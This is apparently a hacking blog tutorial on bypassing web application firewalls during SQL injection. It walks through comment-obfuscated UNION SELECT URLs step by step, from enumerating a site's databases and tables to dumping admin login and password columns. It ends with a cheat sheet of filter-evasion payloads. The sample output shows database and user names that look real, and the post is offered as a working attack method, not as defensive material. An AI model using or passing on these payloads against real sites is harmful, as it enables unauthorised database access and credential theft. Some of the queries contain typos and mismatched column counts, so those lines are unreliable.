OK, so I showed you how to
perform some basic SQLi previously,
but there will be times that it starts off working and then you find yourself
facing a FORBIDDEN page (403 Error) or Not Acceptable. Typically you can find the vulnerable
page, find the column count and then when you switch to use the UNION SELECT
statement you get the errors starting up. This is typically due to the server
side rules that are filtering out your request. This is often referred to as
the Web Application Firewall or WAF, but don’t worry as there are ways we can
beat them. You can get pretty creative with the methods used but for now I will
show how to use comments to bypass the filters, sometimes referred to as inline
comments or C comments.
I will re-use some of my
previous examples and assume the following details have gotten us to where we
are now:
http://www.site.com/index.php?id=725
http://www.site.com/index.php?id=725’’
http://www.site.com/index.php?id=725+ORDER+BY+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=725+ORDER+BY+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=725+UNION+SELECT+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=-725+UNION+SELECT+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=725+UNION+SELECT+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=-725+UNION+SELECT+1,2,3,4,5,,6,7,8--
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8--
SAMPLE IMAGE:
Now there is no more 403
Forbidden message stopping you and you can see the vulnerable columns displayed
on the page. I will re-use my examples and assume columns 6 & 8 are
vulnerable. Now that we have the vulnerable columns we can extract some data,
let’s first find some basic info though. We will use CONCAT to grab the current
database name, the current user, and the version info, like this:
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,ConCAt(database(),user(),version()),7,8--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,CONCAT(database(),user(),version()),7,8--
SAMPLE IMAGE:
Results:
· Version
= 5.5.32-cll
User
= k8806067_pt@localhost
Database()
= k8806067_dbpt
It worked; we now know the
current database name, user name and the version as they are neatly displayed
on the page for us. These two techniques can be combined to evade filters
throughout your Injections as you will see. Now let us try to get the list of
all the databases available, instead of just the current one, like so:
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.SCHEMATA--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
Results:
· Information_Schema
· k8806067_dblibrary
k8806067_dbperkara
k8806067_dbperpus
k8806067_dbpt
SAMPLE IMAGE:
This should now show us the
available databases! Now let us check for the tables tied to the current
database.
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,/*!table_name*/,3,4,5+from+/*!information_schema*/./*!tables*/+where+table_schema=database()--
TABLES
FOUND:
detail_kategori
detail_kfoto, kategori
t_footer, etc
SAMPLE IMAGE:
Now we have all of the
tables for the current database displayed on the page without any 403 holding
us back. We can get columns using the same method as we used in the Basic SQLi
101 examples but we will keep our comments and capitalization techniques alive
so it gets past the WAF (reminder to also HEX your table names).
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1, /*!column_name*/,3,4,5+from+/*!information_schema*/./*!columns*/+where+table_schema=database()--
The page will now display a
list of the columns from the Admin table in the vulnerable column 2 spot on
page. In this example we will assume we found the following column names.
COLUMNS FOUND:
tblpengguna_id
tblpengguna_login
tblpengguna_pass
SAMPLE IMAGE:
OK, now it we know the
tables and associated columns. It is time to get some data extracted, and it
will go the same as it did in the Basic SQLi tutorial, or like this:
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,login,0x3a,password,0x3a,email,0x3a),3,4,5+FROM+Admin--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1, unhex(hex(group_concat(/*!tblpengguna_id,0x7c,tblpengguna_login,0x7c,tblpengguna_pass*/))),3,4,5+from+tblpengguna--
SAMPLE IMAGE:
Alright, you have
successfully gotten past a WAF system! That sums up my coverage of WAF
Bypassing and I hope you have enjoyed it and found it be informative. If you
did, please make sure you check out back often to see what new pages get added.
If you feel I missed anything please let me know so I can update things
accordingly. Below is some additional material that may be useful while you are
on this topic…as always, Enjoy!
Other
Bypass
Union
Selecting Bypass
Code:
union(select(0),version(),(0),(0),(0),(0),(
0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
after
id no. like id=1 +/*!and*/+1=0
Code:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
False
The Url:
Code:
=-id=-1
union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select
Order
Bypassing do like this
Code:
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where table_schema=database()
unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011
5,%2037)
used
with order:
Code:
convert()using
ascii)
unhex(hex())
If
ascii dont work you could try:
Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
